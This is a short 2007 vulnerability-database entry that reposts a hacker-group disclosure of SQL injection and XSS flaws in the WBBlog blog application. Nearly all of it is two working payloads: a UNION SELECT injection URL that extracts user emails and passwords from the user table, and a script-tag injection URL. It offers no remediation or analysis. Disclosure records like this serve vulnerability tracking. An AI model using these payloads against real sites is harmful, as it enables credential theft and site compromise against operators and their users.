WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

2007-03-17T00:00:00
ID SECURITYVULNS:DOC:16395
Type securityvulns
Reporter Securityvulns
Modified 2007-03-17T00:00:00

Description

======================x=o=r=o=n=====================

WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

======================x=o=r=o=n=====================

Bulan: xoron

xoron.biz

======================x=o=r=o=n=====================

SQL INJ:

index.php?cmd=viewentry&e_id=-1//UNION//SELECT//null,null,u_email,null,u_password,null//FROM/*/user/

XSS :

index.php?cmd=viewentry&e_id="><script>alert('HACKED')</script>

======================x=o=r=o=n=====================

Vendor Site: http://liqua.com/wbblog.html

======================x=o=r=o=n=====================

Thnx: pang0

======================x=o=r=o=n=====================